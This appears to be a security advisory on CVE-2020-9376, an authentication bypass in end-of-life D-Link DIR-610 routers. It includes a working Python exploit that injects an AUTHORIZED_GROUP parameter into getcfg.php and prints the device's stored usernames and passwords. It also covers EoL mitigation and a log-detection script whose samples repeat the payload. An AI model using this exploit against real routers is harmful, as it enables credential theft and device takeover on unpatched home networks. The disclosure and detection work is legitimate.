Heitor Gouvêa

CVE-2020-9376 - Authentication bypass on D-LINK 610 Router

Summary

The DIR-610 is a router developed and sold by D-Link and distributed in Central and South America. An attacker can use CVE-2020-9376 and CVE-2020-9377 to bypass the device's authentication mechanism and gain access to the router's administration panel, which in turn allows arbitrary code execution directly on the device's operating system.


Description


Exploit

#!/usr/bin/python

import xml.etree.ElementTree as ET
import urllib2
import sys

def main(host, port):
    # POST the crafted SERVICES value to getcfg.php; the encoded newline (%0a)
    # smuggles an AUTHORIZED_GROUP=1 parameter into the request, and the
    # device answers with the DEVICE.ACCOUNT configuration as XML.
    content = urllib2.urlopen('http://%s:%s/getcfg.php' % (host, port), 'SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1').read()
    root = ET.fromstring(content)

    # Each <entry> under module/device/account holds one local account.
    for user in root.findall('./module/device/account/entry'):
        name = user.findall('./name')[0].text
        password = user.findall('./password')[0].text

        print 'User: %s\nPassword: %s\n\n' % (name, password)

if __name__ == '__main__':
    [host, port] = sys.argv[1:3]
    main(host, port)

Impact

An attacker can circumvent the authentication mechanisms of this device and gain access to the administration panel, and with it to restricted information such as the user accounts and passwords stored on the device. With that access they can then exploit CVE-2020-9377, a remote code execution vulnerability.


Mitigation

While D-Link is aware of vulnerabilities involving DIR-610, these products have reached End of Life (EoL)/End of Support (EoS) and there is no extended support or development for them. D-Link will not be able to resolve device or firmware issues as all development and customer support has ceased.

The DIR-610 Rev. Ax reached its End of Support date in 2014; it is no longer supported and firmware development has stopped. All consumers still using the product should retire it and replace the device immediately.
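Because no firmware fix will ever ship, the only real remediation is replacing the device; until that happens, the bypass request is easy to spot at a reverse proxy or IDS that sits in front of the router. The following detection helper is an added example, not code from the original advisory or from D-Link: it assumes an access log that records client, method, path and raw request body on one line (a constructed format), and it flags requests to getcfg.php whose body carries an AUTHORIZED_GROUP parameter or a smuggled CR/LF, the pattern the published exploit relies on. The sample log lines are constructed for the example.

```python
#!/usr/bin/env python3
"""Flag CVE-2020-9376-style requests to a DIR-610's getcfg.php endpoint.

Added detection example (not part of the original advisory). Assumes a
proxy or IDS log line of the form: "<client> <method> <path> <raw body>".
"""
import re
from urllib.parse import unquote

# Constructed sample log lines (assumed format, not real device logs).
SAMPLE_LOGS = [
    '192.0.2.10 POST /getcfg.php SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1',
    '192.0.2.11 POST /getcfg.php SERVICES=WAN.STATUS',
    '192.0.2.12 GET /login.php -',
    '192.0.2.13 POST /getcfg.php SERVICES=DEVICE.ACCOUNT%0d%0aAUTHORIZED_GROUP=1',
    '192.0.2.14 POST /getcfg.php AUTHORIZED_GROUP=1&SERVICES=DEVICE.ACCOUNT',
    'garbage line that does not parse',
]

LOG_RE = re.compile(r'^(?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<body>.*)$')


def parse_line(line):
    """Split one log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_getcfg_bypass(path, body):
    """Return True when a getcfg.php request looks like the authentication bypass.

    Assumption drawn from the exploit payload: AUTHORIZED_GROUP is something the
    device sets for an authenticated session, so a client must never supply it.
    A CR/LF inside a form value (the %0a in the payload) is the injection vector
    and is treated as suspicious on its own, even without the parameter name.
    """
    if not path.split('?', 1)[0].endswith('/getcfg.php'):
        return False
    decoded = unquote(body)
    if 'AUTHORIZED_GROUP' in decoded.upper():
        return True
    return '\n' in decoded or '\r' in decoded


def scan(lines):
    """Return (client, decoded_body) for every line that matches the bypass pattern."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable lines are skipped, not treated as alerts
        if is_getcfg_bypass(rec['path'], rec['body']):
            hits.append((rec['client'], unquote(rec['body'])))
    return hits


if __name__ == '__main__':
    for client, body in scan(SAMPLE_LOGS):
        print('ALERT getcfg.php bypass attempt from %s: %r' % (client, body))
```

Percent-decoding before matching matters: the literal newline never appears in the raw log, only its %0a (or %0d%0a) encoding, and the parameter can be placed anywhere in the body, so matching on the decoded text rather than on the exact published payload catches simple variations. A parse failure is deliberately not an alert, to keep a noisy log from flooding the detection with false positives.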


Conclusion


References

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
  2. https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
  3. https://www.dlink.com.br/produto/dir-610/
  4. https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A2-Broken_Authentication
  5. https://portswigger.net/web-security/authentication